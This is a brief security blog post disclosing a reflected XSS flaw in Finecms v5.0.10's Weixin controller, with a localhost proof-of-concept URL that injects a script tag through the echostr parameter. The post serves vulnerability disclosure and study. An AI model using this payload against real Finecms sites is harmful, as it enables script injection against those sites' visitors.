朝花夕拾|勿忘初心 朝花夕拾|勿忘初心

Finecms Weixin reflected XSS

in 代码审计 read (1167) 0汉字 站长Lucifaer 文章转载请注明来源!

Today I found a reflected XSS in Finecms v5.0.10.

Technical Description:

file /finecms/dayrui/controllers/Weixin.php function index without any limit and can resulting xss.

Poc

view website

http://localhost:9999/index.php?c=weixin&m=index&nonce=1&timestamp=1&signature=17ba0791499db908433b80f37c5fbc89b870084b&echostr=<script>alert('1')</script>

审计
最后由Lucifaer修改于2017-08-17 18:45

此处评论已关闭

博客已萌萌哒运行
© 2018 由 Typecho 强力驱动.Theme by Yodu
PREVIOUS NEXT
雷姆
拉姆